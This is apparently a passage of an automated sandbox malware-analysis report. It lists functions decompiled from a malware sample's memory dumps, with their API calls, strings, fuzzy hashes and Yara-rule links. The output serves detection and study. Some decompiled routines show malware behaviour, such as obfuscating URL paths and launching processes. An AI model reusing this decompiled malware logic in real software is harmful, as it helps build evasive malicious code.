				_t8 =  *0x2c9d2a4; // 0x24aa5a8
				_t3 = _t8 + 0x2c9e862; // 0x61636f4c
				_t25 = 0;
				_t30 = E02C964A0(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x2c9d2a8, 1, 0, _t30);
					E02C9A5FA(_t30);
				}
				_t12 =  *0x2c9d25c; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E02C97F56() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E02C94EEC(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x2c9d110( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E02C94359(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}

0x02c98c8f
0x02c98c96
0x02c98ca0
0x02c98ca4
0x02c98caa
0x02c98cb9
0x02c98cc0
0x02c98cc4
0x02c98cd6
0x02c98cd8
0x02c98cd8
0x02c98cdd
0x02c98ce4
0x02c98d3b
0x02c98d3b
0x02c98d41
0x02c98d43
0x02c98d43
0x02c98d4d
0x02c98d51
0x02c98d63
0x02c98d63
0x02c98d67
0x02c98d6d
0x02c98d6d
0x00000000
0x02c98cfd
0x02c98d02
0x02c98d0a
0x02c98d0e
0x02c98d12
0x02c98d12
0x02c98d1f
0x02c98d23
0x02c98d27
0x02c98d7c
0x02c98d82
0x02c98d82
0x02c98d35
0x02c98d39
0x02c98d70
0x02c98d72
0x02c98d75
0x02c98d75
0x00000000
0x02c98d72
0x02c98d39
0x00000000
0x02c98d23

APIs

Part of subcall function 02C964A0: lstrlen.KERNEL32(02C95D90,00000000,00000000,00000027,00000005,00000000,00000000,02C941C3,74666F53,00000000,02C95D90,02C9D00C,?,02C95D90), ref: 02C964D6
Part of subcall function 02C964A0: lstrcpy.KERNEL32(00000000,00000000), ref: 02C964FA
Part of subcall function 02C964A0: lstrcat.KERNEL32(00000000,00000000), ref: 02C96502

CreateEventA.KERNEL32(02C9D2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,02C986E3,?,00000001,?), ref: 02C98CCF

Part of subcall function 02C9A5FA: HeapFree.KERNEL32(00000000,00000000,02C981B4,00000000,?,?,00000000), ref: 02C9A606

WaitForSingleObject.KERNEL32(00000000,00004E20,02C986E3,00000000,00000000,?,00000000,?,02C986E3,?,00000001,?,?,?,?,02C9858E), ref: 02C98D2F
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,02C986E3,?,00000001,?), ref: 02C98D5D
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,02C986E3,?,00000001,?,?,?,?,02C9858E), ref: 02C98D75

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: f4ee828f4565c4514b9673d7b75d89a9c6afcc43717b39f162a22bdfc9721945
Instruction ID: 5e0e20b327ccf4f97573a379db9e66546fcdb0ea477d34f81674faccd3a81642
Opcode Fuzzy Hash: f4ee828f4565c4514b9673d7b75d89a9c6afcc43717b39f162a22bdfc9721945
Instruction Fuzzy Hash: FD213A73A417125BCF316B6C9C8CB6B7399EFDAB58F050B16FA46E7140D724CE018680

Uniqueness

Uniqueness Score: -1.00%

Function 02C98634, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E02C98634(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E02C9A7FF(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E02C92884(_t23);
						}
					}
					return _t38;
				}
				if(E02C9A762(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x2c9d2a8, 1, 0,  *0x2c9d344);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E02C92E7B(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E02C93F60(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E02C98371(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E02C98C8E( &_v32, _t39);
					goto L13;
				}
			}

0x02c98634
0x02c98641
0x02c98647
0x02c98648
0x02c98649
0x02c9864a
0x02c9864b
0x02c9864f
0x02c9865b
0x02c9865f
0x02c986e7
0x02c986e7
0x02c986ea
0x02c986ec
0x02c986f4
0x02c986f4
0x02c986fa
0x02c986fd
0x02c986fd
0x02c986fa
0x02c98708
0x02c98708
0x02c98672
0x02c98674
0x02c98674
0x02c9868b
0x02c9868f
0x02c98692
0x02c9869d
0x02c986a4
0x02c986a4
0x02c986ad
0x02c986b1
0x02c986bf
0x02c986b3
0x02c986b3
0x02c986b4
0x02c986b5
0x02c986b6
0x02c986b7
0x02c986b8
0x02c986b8
0x02c986c4
0x02c986c7
0x02c986cb
0x02c986cd
0x02c986cd
0x02c986d4
0x00000000
0x02c986d6
0x02c986d6
0x02c986e3
0x00000000
0x02c986e3

APIs

CreateEventA.KERNEL32(02C9D2A8,00000001,00000000,00000040,00000001,?,747DF710,00000000,747DF730,?,?,?,02C9858E,?,00000001,?), ref: 02C98685
SetEvent.KERNEL32(00000000,?,?,?,02C9858E,?,00000001,?,00000002,?,?,02C95DBE,?), ref: 02C98692
Sleep.KERNEL32(00000BB8,?,?,?,02C9858E,?,00000001,?,00000002,?,?,02C95DBE,?), ref: 02C9869D
CloseHandle.KERNEL32(00000000,?,?,?,02C9858E,?,00000001,?,00000002,?,?,02C95DBE,?), ref: 02C986A4

Part of subcall function 02C92E7B: WaitForSingleObject.KERNEL32(00000000,?,?,?,02C986C4,?,02C986C4,?,?,?,?,?,02C986C4,?), ref: 02C92F55

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Event$CloseCreateHandleObjectSingleSleepWait
String ID:
API String ID: 2559942907-0
Opcode ID: 0e10efcec9e4701d9962b6c1fac83e3ac4995a0ee9579f09f9ebe38662af40d4
Instruction ID: d98fe07aa3b61feb0e8c51abfd33a6b7e41825a78fe5d308c34c15939eb1b818
Opcode Fuzzy Hash: 0e10efcec9e4701d9962b6c1fac83e3ac4995a0ee9579f09f9ebe38662af40d4
Instruction Fuzzy Hash: F1219673D00219ABCF10BFE4888DDAE77BDEF89354B054665EA12E7100D7359B45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02C91239, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E02C91239(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E02C97E20(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x02c91245
0x02c91249
0x02c9124a
0x02c9124b
0x02c9124d
0x02c9124f
0x02c91252
0x02c91257
0x02c912ee
0x02c912f5
0x02c912f5
0x02c91260
0x02c91267
0x02c91277
0x02c91277
0x02c9127d
0x02c9127f
0x02c91284
0x02c9128d
0x02c91293
0x02c91298
0x02c912a3
0x02c912a7
0x02c912a9
0x02c912aa
0x02c912b3
0x02c912b7
0x02c912c8
0x02c912b9
0x02c912be
0x02c912c3
0x02c912d2
0x02c912d2
0x02c912a7
0x02c912d8
0x02c912de
0x02c912de
0x02c912e7
0x02c912ec
0x02c912ec
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 02C91267
lstrlenW.KERNEL32(?), ref: 02C9129D
memcpy.NTDLL(00000000,?,?,?), ref: 02C912BE
SysFreeString.OLEAUT32(?), ref: 02C912D2

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: 970f427057abfcc6a471bbc785d7e2f75c6e37b2e64a97250ccbc085f05c03ad
Instruction ID: ba444a13bb2122b1b3dabee2d5dc88ec2f77e8ab34f1fb4ebf6d07926912ebfc
Opcode Fuzzy Hash: 970f427057abfcc6a471bbc785d7e2f75c6e37b2e64a97250ccbc085f05c03ad
Instruction Fuzzy Hash: A6216D7590060AEFCF11EFE8C98899EBBB9FF48305B1441A9E905E7200EB70DA00DF50

Uniqueness

Uniqueness Score: -1.00%

Function 02C97EBE, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E02C97EBE(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x2c9d238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x2c9d250; // 0x14b551cd
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x2c9d250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x02c97ec6
0x02c97ec9
0x02c97ecf
0x02c97ee7
0x02c97ee9
0x02c97eee
0x02c97ef0
0x02c97ef3
0x02c97ef5
0x02c97ef8
0x02c97efa
0x02c97efa
0x02c97efc
0x02c97f07
0x02c97f0c
0x02c97f1d
0x02c97f25
0x02c97f2a
0x02c97f2d
0x02c97f30
0x02c97f32
0x02c97f35
0x02c97f38
0x02c97f38
0x02c97f3b
0x02c97f46
0x02c97f4b
0x02c97f55

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02C988D3,00000000,?,?,02C92AF0,?,051495B0), ref: 02C97EC9
RtlAllocateHeap.NTDLL(00000000,?), ref: 02C97EE1
memcpy.NTDLL(00000000,?,-00000008,?,?,?,02C988D3,00000000,?,?,02C92AF0,?,051495B0), ref: 02C97F25
memcpy.NTDLL(00000001,?,00000001), ref: 02C97F46

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 425e1fb35242f52096b8705ae25dc5fa8ac1f069ae80aaeffdfce1325dc80120
Instruction ID: 6285c78f0217d61744e8c42ee6ec0e1b437e162bb9f46c33dfd6536068e92993
Opcode Fuzzy Hash: 425e1fb35242f52096b8705ae25dc5fa8ac1f069ae80aaeffdfce1325dc80120
Instruction Fuzzy Hash: DD1106B2A01114BFD7108B69DC8CE9ABBAEEBD5760B150276F50597150E770DE14C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 02C964A0, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E02C964A0(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E02C9427C(_t8, _t1);
				_t16 = E02C97E20(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E02C94588(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E02C97E20(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E02C9A5FA(_t16);
				}
				return _t18;
			}

0x02c964ab
0x02c964ac
0x02c964af
0x02c964b1
0x02c964bc
0x02c964c0
0x02c964c5
0x02c964c9
0x02c964d1
0x02c964d6
0x02c964de
0x02c964de
0x02c964e7
0x02c964eb
0x02c964f1
0x02c964f4
0x02c964fa
0x02c964fa
0x02c96502
0x02c96502
0x02c96509
0x02c96509
0x02c96514

APIs

Part of subcall function 02C97E20: RtlAllocateHeap.NTDLL(00000000,00000000,02C98112), ref: 02C97E2C

Part of subcall function 02C94588: wsprintfA.USER32 ref: 02C945E4

lstrlen.KERNEL32(02C95D90,00000000,00000000,00000027,00000005,00000000,00000000,02C941C3,74666F53,00000000,02C95D90,02C9D00C,?,02C95D90), ref: 02C964D6
lstrcpy.KERNEL32(00000000,00000000), ref: 02C964FA
lstrcat.KERNEL32(00000000,00000000), ref: 02C96502

Strings

Soft, xrefs: 02C964AC, 02C964C5

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
String ID: Soft
API String ID: 393707159-3753413193
Opcode ID: 36c99f0f2c564afef4226bd34c860392d41001fee93ccbe5f9424949594a16ed
Instruction ID: bb9c6e40a2f4823bf60f089a82e6de222f753eb0661ca8cd6bbfc6c34d17547f
Opcode Fuzzy Hash: 36c99f0f2c564afef4226bd34c860392d41001fee93ccbe5f9424949594a16ed
Instruction Fuzzy Hash: 6501D672100255BBCF123BA89C8CBAF7B6EEFC9245F144121F6055A144DB34CA569BE1

Uniqueness

Uniqueness Score: -1.00%

Function 02C94359, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E02C94359(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr _t27;
				long _t28;

				_t27 = __edi;
				_t26 = _a8;
				_t28 = E02C91598(_a4, _t26, __edi);
				if(_t28 != 0) {
					memset( &_v60, 0, 0x38);
					_t18 =  *0x2c9d2a4; // 0x24aa5a8
					_t28 = 0;
					_v64 = 0x3c;
					if(_a12 == 0) {
						_t7 = _t18 + 0x2c9e4e8; // 0x70006f
						_t19 = _t7;
					} else {
						_t6 = _t18 + 0x2c9e90c; // 0x750072
						_t19 = _t6;
					}
					_v52 = _t19;
					_push(_t28);
					_v48 = _a4;
					_v44 = _t26;
					_v36 = _t27;
					E02C99186();
					_push( &_v64);
					if( *0x2c9d0e4() == 0) {
						_t28 = GetLastError();
					}
					_push(1);
					E02C99186();
				}
				return _t28;
			}

0x02c94359
0x02c94360
0x02c9436e
0x02c94372
0x02c9437c
0x02c94381
0x02c94386
0x02c9438b
0x02c94395
0x02c9439f
0x02c9439f
0x02c94397
0x02c94397
0x02c94397
0x02c94397
0x02c943a5
0x02c943ab
0x02c943ac
0x02c943af
0x02c943b2
0x02c943b5
0x02c943bd
0x02c943c6
0x02c943ce
0x02c943ce
0x02c943d0
0x02c943d2
0x02c943d2
0x02c943dc

APIs

Part of subcall function 02C91598: SysAllocString.OLEAUT32(00000000), ref: 02C915F2
Part of subcall function 02C91598: SysAllocString.OLEAUT32(0070006F), ref: 02C91606
Part of subcall function 02C91598: SysAllocString.OLEAUT32(00000000), ref: 02C91618

memset.NTDLL ref: 02C9437C
GetLastError.KERNEL32 ref: 02C943C8

Strings

@MxtNxt, xrefs: 02C943C8
<, xrefs: 02C9438B

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocString$ErrorLastmemset
String ID: <$@MxtNxt
API String ID: 3736384471-3662781078
Opcode ID: 1aa84e42c8c69bb40c501c30d32550cdd0963d8d81fecb0ab7edc35c476d0aba
Instruction ID: 9e2aaab7cfcea3cb557d016b6ccc086f6162f7650841aafa4150003fd6b34bc4
Opcode Fuzzy Hash: 1aa84e42c8c69bb40c501c30d32550cdd0963d8d81fecb0ab7edc35c476d0aba
Instruction Fuzzy Hash: DD012D31D00218ABDB20EFA5E88CEDE7BB8BF48744F454526F908A7140E770DA118BA1

Uniqueness

Uniqueness Score: -1.00%

Function 02C98AED, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02C98AED(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}

0x02c98af7
0x02c98afb
0x02c98b10
0x02c98b12
0x02c98b17
0x02c98b1d
0x02c98b1f
0x02c98b24
0x02c98b2f
0x02c98b26
0x02c98b26
0x02c98b26
0x02c98b24
0x02c98b3d

APIs

memset.NTDLL ref: 02C98AFB
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,747C81D0), ref: 02C98B10
CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 02C98B1D
CloseHandle.KERNEL32(?), ref: 02C98B2F

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: CreateEvent$CloseHandlememset
String ID:
API String ID: 2812548120-0
Opcode ID: f815c4e6129a570f1b1742c5b8d89e4ee1caad9266b2ccabace365ed9c3fd10a
Instruction ID: 1520775e23196c57d97d382a032264a55285ab76438042861bef6fd42351c16e
Opcode Fuzzy Hash: f815c4e6129a570f1b1742c5b8d89e4ee1caad9266b2ccabace365ed9c3fd10a
Instruction Fuzzy Hash: D8F082F150570C7FD7106F66DCC8C27BBACEB9619CB154F2EF14282501D675A9188A60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B49F0, Relevance: 6.0, APIs: 4, Instructions: 34libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(6E1B48F7,00000000,00000800,?,?,6E1B48F7,00000000), ref: 6E1B49FF
GetLastError.KERNEL32(?,?,6E1B48F7), ref: 6E1B4A13
_wcsncmp.LIBCMTD ref: 6E1B4A29
LoadLibraryExW.KERNEL32(6E1B48F7,00000000,00000000,?,6E1B48F7), ref: 6E1B4A3D

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: LibraryLoad$ErrorLast_wcsncmp
String ID:
API String ID: 4169583555-0
Opcode ID: 82614a7493958b42c8c29113daad983daebf2e320e85da19a4a22fd8fe878da8
Instruction ID: 67303db22f68ae622d021c565df28efce9d921073b00a358e6957369487df0ab
Opcode Fuzzy Hash: 82614a7493958b42c8c29113daad983daebf2e320e85da19a4a22fd8fe878da8
Instruction Fuzzy Hash: 63F05474A44218FFEB60DBF0CC49B9D37799B01700F208414FA0A9B2C4E7B1EA84D7A4

Uniqueness

Uniqueness Score: -1.00%

Function 02C9469F, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02C9469F() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x2c9d26c; // 0x314
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x2c9d2b8; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x2c9d26c; // 0x314
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x2c9d238; // 0x4d50000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x02c9469f
0x02c946a6
0x02c946f0
0x02c946f2
0x02c946f2
0x02c946aa
0x02c946b0
0x02c946b5
0x02c946b9
0x02c946bf
0x02c946c6
0x00000000
0x00000000
0x02c946c8
0x02c946cd
0x00000000
0x00000000
0x00000000
0x02c946cd
0x02c946cf
0x02c946d7
0x02c946da
0x02c946da
0x02c946e0
0x02c946e7
0x02c946ea
0x02c946ea
0x00000000

APIs

SetEvent.KERNEL32(00000314,00000001,02C9649A), ref: 02C946AA
SleepEx.KERNEL32(00000064,00000001), ref: 02C946B9
CloseHandle.KERNEL32(00000314), ref: 02C946DA
HeapDestroy.KERNEL32(04D50000), ref: 02C946EA

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: d8922d4168e42883da774bf0181e306abf93170a2fc95ad5671a02f87d45592d
Instruction ID: 3a888afabdf233b6be5fb41e59de5e4aeb9819ed0a2862a0977360b82aaca537
Opcode Fuzzy Hash: d8922d4168e42883da774bf0181e306abf93170a2fc95ad5671a02f87d45592d
Instruction Fuzzy Hash: 55F0E5B1F8131287DF347F34A94DF023BD8AB08769B040B01B802E32C0CF20DA60CAA4

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E6E60, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 205COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(0000FDE9,?), ref: 6E1E6E93

Strings

, xrefs: 6E1E6F64
z, xrefs: 6E1E7167

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Info
String ID: $z
API String ID: 1807457897-2251613814
Opcode ID: c10cb0e775f3e4c5892551370c2cf636e2869febc1fa64d48b7c51ecbefaa45c
Instruction ID: 0fe0b7309c3830b60132bec68bd85dda1a14ddfc2d9a9846584a81a2b9d31ade
Opcode Fuzzy Hash: c10cb0e775f3e4c5892551370c2cf636e2869febc1fa64d48b7c51ecbefaa45c
Instruction Fuzzy Hash: 16A12C70A4825C9FEB26CF89C891BE9B771EB45304F0480D9E94D5B6C2C274AED1DF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B9370, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 175timeCOMMON

Download Yara Rule

APIs

std::_Timevec::_Timevec.LIBCPMTD ref: 6E1B9444
std::_Timevec::_Timevec.LIBCPMTD ref: 6E1B948D

Strings

, xrefs: 6E1B940F

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: TimevecTimevec::_std::_
String ID:
API String ID: 4219598475-3916222277
Opcode ID: 6c127f458c81dfb936e8cc25fc322f75a8904ace768720bf54ca97e890171ee9
Instruction ID: 94ec2a6ff8e8d8e48cdabdb541263a0ae630b96c5667397971d49a995740bea7
Opcode Fuzzy Hash: 6c127f458c81dfb936e8cc25fc322f75a8904ace768720bf54ca97e890171ee9
Instruction Fuzzy Hash: 3E7108B4E00209DFCB04DFE4D891AEEB7B5BF58304F208569D515BB394E735AA82CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A055A, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

OpenMutexW.KERNEL32(001F0001,00000001,C:\Windows), ref: 6E1A056E
GetWindowsDirectoryW.KERNEL32(C:\Windows,00000649), ref: 6E1A05CD

Strings

C:\Windows, xrefs: 6E1A0561, 6E1A0566, 6E1A05CC

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: DirectoryMutexOpenWindows
String ID: C:\Windows
API String ID: 3115804697-2661751657
Opcode ID: d847e650cbe3b8248d703cbbe6841f7c35e1b12e1590e48705f2faebfc279b21
Instruction ID: 4bfc400a3efa3a965cba5b9319229f6baeea6d32ed012b00b72775faa923f44d
